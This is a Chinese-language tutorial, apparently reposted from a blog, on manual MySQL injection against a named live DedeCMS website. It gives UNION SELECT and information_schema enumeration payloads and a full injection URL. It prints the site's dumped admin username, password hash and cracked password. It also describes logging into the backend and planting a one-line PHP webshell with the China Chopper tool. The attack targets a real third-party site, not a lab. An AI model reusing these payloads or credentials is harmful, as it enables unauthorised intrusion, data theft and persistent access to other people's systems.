博客已轉(zhuǎn)移到：PHP開發(fā)

注：此文章獻(xiàn)給那些還對注入不怎么理解的人學(xué)習(xí)！

找到注入點(diǎn)后猜字段，可用order by 1猜解，order by不可用時，可用union聯(lián)合查詢！

我這里猜解到的字段是22， 上圖：

接下來爆顯示位！語法: and 1=2 union select1,2,4,5,...,22 字段多少就輸入多少，中間太常，省略了！

然后回車打開，頁面出現(xiàn)了一個9的數(shù)字！如圖：

然后我們來查詢下是什么版本，用戶名，數(shù)據(jù)庫！

version() 版本database()當(dāng)前數(shù)據(jù)庫 user() 用戶，要查詢什么就把剛才爆出9的顯示位替換掉，如圖：

這是版本號，如果要查詢用戶名就把瀏覽器上面的9替換成 user()就行了！

這是我查出來

版本號：5.1.32-community

數(shù)據(jù)庫：51teamcom

用戶名：51teamcom 數(shù)據(jù)庫和用戶名一樣！

接下來我們來報(bào)表了， 語法 ：FROM information_schema.TABLESwhere table_schema=database() limit 0，1 把瀏覽器里

的9改成 table_name ，然后回車，你就會看到表了，第一個表是：dede_addonarticle 我們只要爆出的管理員的表就行了！

我們繼續(xù)爆，每爆一個就得修改下這個語法 limit 0，1 爆第2個的時候把0改成1，比如：limit 1，1 爆第3個的時候繼續(xù)+1 如：limit 2，1 php中0是第一位！

這是我爆出來的表：

dede_addonproduct,dede_admin,dede_admintype,dede_arcatt,dede_arccache,dede_archives,dede_arcrank,dede_arctiny,ddede_arctype,dede_channeltype,dede_co_htmls,dede_co_mediaurls,dede_co_note,dede_co_urls,dede_diyforms,dede_feedback,dede_flink,dede_flinktype,dede_freelist,dede_guestbook,dede_homepageset

織夢的程序！

其中dede_admin 應(yīng)該就是管理員的表了！我們爆下看！

爆之前，我們先把dede_admin 轉(zhuǎn)換成16進(jìn)制的，就是這個 646564655F61646D696E

語法：information_schema.columns WHEREtable_name=0x646564655F61646D696E limit0，1 還是跟上面一樣，爆第幾個就修改數(shù)字 0 ，把我們剛才轉(zhuǎn)換的16進(jìn)制放到0x后面，0x不要動，然后把顯示位9的數(shù)字改成 column_name 然后就行！

我爆的段：id,userid,pwd,uname,tname,email pwd應(yīng)該就是密碼，uname應(yīng)該是賬號，我們試試！

and 1=2 union select 1,2,3,4,5,6...,22 from dede_admin 把瀏覽器里面的語法全部去掉，剩***入點(diǎn)就行，就是這樣；

http://www.51team.cn/about.php?id=10 and 1=2 unionselect 1,2,3,4,5,6...,22 from dede_admin 然后回車！

然后把9替換成剛才我爆出來的字段 我替換了uname和pwd，開了2個瀏覽器！

用戶是：admin密碼是：d9d2b2de067864194059 密碼加密的，可到cmd5.com解密 如圖：

密碼解出來了，這個 bx2013 ，接下來找后臺，可以用軟件掃或者谷歌找！我找出來了：

成功登陸：

隨便找個上傳點(diǎn)就行，然后上傳馬，先掛個txt吧，嘿嘿！http://www.51team.cn/a.txt

接下來，***咯！

***可以上傳***馬，也可以用菜刀，我就用菜刀的吧，方便！隨便找個php文件添加一句話！

好，連接了

如果你是用網(wǎng)馬脫的話，就得看網(wǎng)站配置文件conn.php 里面的數(shù)據(jù)庫用戶名和密碼！

連接后，點(diǎn)網(wǎng)站列表，然后在網(wǎng)址那里右鍵點(diǎn)擊數(shù)據(jù)庫管理，然后打開一個窗口，那個窗口就是數(shù)據(jù)庫了！如圖：

與50位技術(shù)專家面對面20年技術(shù)見證，附贈技術(shù)全景圖

總結(jié)

以上是生活随笔為你收集整理的mysql手注_php+mysql手注拿shell教程【朋友给的】的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。